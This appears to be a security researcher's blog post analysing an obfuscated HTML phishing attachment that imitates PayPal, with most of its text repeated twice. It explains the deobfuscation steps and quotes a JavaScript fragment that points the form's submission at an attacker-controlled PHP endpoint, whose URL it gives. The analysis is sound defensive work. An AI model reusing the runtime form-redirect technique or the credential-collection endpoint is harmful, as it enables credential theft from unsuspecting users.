PayPal phishing campaign which uses Obfuscated HTML attachments has been active since past few months.
In most cases, the HTML attachments which are sent for phishing the credentials are not obfuscated. This allows easy static analysis and they are detected successfully by products. However, obfuscated HTML pages make it difficult to detect them.
In this article we will look at Obfuscated HTML attachments used in PayPal Phishing campaigns and how they can be effectively analyzed.
Obfuscated HTML attachment looks as shown in Figure 1.
The PayPal Phishing page when opened with a Browser, looks as shown in Figure 2. We can see that it requests personal information from the user.
Now, let us look at how the HTML page can be deobfuscated. We can see in Figure 3 that after the code is deobfuscated, it is displayed in the Browser using document.write()
To see the deobfuscated code, we will display the value in a textarea box. This can be done by modifying the document.write() statement in the original obfuscated HTML page as shown in Figure 4.
When we open the modified HTML page with Browser, we can see the complete deobfuscated code as shown in Figure 5.
If we look at the HTML form in the deobfuscated page, we can see that the HTML form's action points to http://paypal.com as shown in Figure 6. In most of the phishing HTML pages, we see that HTML form's action field points to attacker's controlled webserver. However, this is what makes this instance of PayPal phishing interesting.
So, how is the HTML Form's action field modified at runtime? It is done using the JavaScript function, initsub(). In Figure 7, we can see that the JavaScript function, initsub() is called when the HTML form is submitted.
The JavaScript function, initsub() is shown in Figure 8.
We can see an obfuscated array in the above JavaScript. The array variable name is: _0xf7b4. This array contains strings which are represented using the ASCII value of corresponding bytes. To display the actual strings, we can use Mozilla Firefox's Web Console as shown in Figure 9.
When we enter the array name in the Web Console, all the strings will be printed.
We can identify the HTML form's action URL as shown below:
var _0x13632f = "fb60d411a5c5b72b2e7d3527cfc84fd0.php";
var _0x1a7d65 = _0xf7b4[2] ;
_0x1a7d65+=_0x13632f;
The complete URL is: http://relaylinks.net/fb60d411a5c5b72b2e7d3527cfc84fd0.php
Whois look up information for the domain, relaylinks.net shows that it was registered on 17th August 2015.
Most of the domains used in this PayPal phishing campaign have been registered recently by the attackers.
I will soon post a list of different domains and the complete URLs used for phishing.
Thanks.
In most cases, the HTML attachments which are sent for phishing the credentials are not obfuscated. This allows easy static analysis and they are detected successfully by products. However, obfuscated HTML pages make it difficult to detect them.
In this article we will look at Obfuscated HTML attachments used in PayPal Phishing campaigns and how they can be effectively analyzed.
Obfuscated HTML attachment looks as shown in Figure 1.
Figure 1: Obfuscated HTML Page
The PayPal Phishing page when opened with a Browser, looks as shown in Figure 2. We can see that it requests personal information from the user.
Figure 2: PayPal Phishing Page
Now, let us look at how the HTML page can be deobfuscated. We can see in Figure 3 that after the code is deobfuscated, it is displayed in the Browser using document.write()
Figure 3: Document.write in Obfuscated HTML page.
To see the deobfuscated code, we will display the value in a textarea box. This can be done by modifying the document.write() statement in the original obfuscated HTML page as shown in Figure 4.
Figure 4: Modify document.write() in Obfuscated HTML page
Figure 5: Deobfuscated HTML Page
Figure 6: HTML Form's action field in deobfuscated HTML page.
Figure 7: JavaScript function called when HTML form is submitted.
Figure 8: JavaScript function, initsub()
Figure 9: Decode the Array using Firefox's Web Console
We can identify the HTML form's action URL as shown below:
var _0x13632f = "fb60d411a5c5b72b2e7d3527cfc84fd0.php";
var _0x1a7d65 = _0xf7b4[2] ;
_0x1a7d65+=_0x13632f;
The complete URL is: http://relaylinks.net/fb60d411a5c5b72b2e7d3527cfc84fd0.php
Whois look up information for the domain, relaylinks.net shows that it was registered on 17th August 2015.
Most of the domains used in this PayPal phishing campaign have been registered recently by the attackers.
I will soon post a list of different domains and the complete URLs used for phishing.
Thanks.